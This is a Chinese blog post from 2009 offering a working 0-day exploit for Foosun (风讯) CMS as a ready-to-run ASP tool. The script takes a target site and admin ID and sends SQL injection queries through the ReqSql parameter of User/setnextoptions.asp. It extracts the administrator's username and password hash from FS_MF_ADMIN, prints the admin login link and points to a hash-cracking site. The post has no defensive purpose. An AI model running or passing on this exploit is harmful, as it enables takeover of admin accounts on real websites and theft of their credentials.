风讯CMS 0DAY exploits
2009年10月17日 |
把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
<herd><title>foosun cms 0day exploits</title> </herd> <body> <% web=request("web") id=request("id") %> 关键字:会员注册step 1 of 4 step<br> <form action='' method=post> 输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br> 要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br> <input type=submit value="我要暴"> </form> <form> <% function bin2str(bin) dim tmp,ustr tmp="" for i=1 to LenB(bin)-1 ustr=AscB(MidB(bin,i,1)) if ustr>127 then i=i+1 tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1))) else tmp=tmp&chr(ustr) end if next bin2str=tmp end function webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id if web="" then else set x=server.createObject("Microsoft.XMLHTTP") x.open "get",webuser,false x.send str=bin2str(x.responseBody) response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>" response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>" for i=126 to len(str) mid1=mid1&mid(str,i,1) next response.write "<br>------------------<br>帐号:"&mid1&"<br>" x.open "get",webpass,false x.send str=bin2str(x.responseBody) for i=126 to len(str) mid2=mid2&mid(str,i,1) next response.write "<br>密码:"&mid2&"<br>------------------<br>" response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>" set x=nothing end if %> |
具体的利用方法请参考源码。
« 杀毒记
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!